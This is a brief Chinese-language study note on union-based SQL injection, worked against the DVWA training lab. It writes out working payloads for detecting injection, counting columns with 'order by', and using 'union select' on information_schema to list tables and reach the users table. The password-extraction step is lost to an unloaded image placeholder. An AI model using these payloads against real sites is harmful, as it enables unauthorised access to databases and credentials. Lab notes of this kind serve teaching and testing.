SQL注入小结
一.union注入的原理以及代码演示:
1.1SQL注入漏洞的判断:
1‘ and 1=1; #与1’ and 1=2; #的返回页面是否不一样:
发现不一样,则初步判断存在SQL注入漏洞
1.2SQL注入字段数的判断:
1‘ order by 1,2,3; #如果当为3的时候出现报错,则说明字段数为2
1.3 union联合查询获取敏感信息:
1’and 1=2 union select 1, 2; #
说明可以使用union all
进一步获取信息:1’and 1=2 union select 1, (database()); #
替换之后可查其他信息:
1.4进阶SQL注入攻击:
目前已知 dvwa库下有两个字段:我们尝试获取下一步信息:
1'and 1=2 union select 1, (select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,2); #
limit(1,?)可以替换,这里我理解为有几个字段。
最终得到两个字段为:guestbook users
users表示用户,接下来我们主要获取user表里的信息:
最后直接出密码:
]
最后直接出密码:
[外链图片转存中…(img-RVWwLA1L-1693384676072)]
注意:这只是非常简单,没有任何过滤的情况。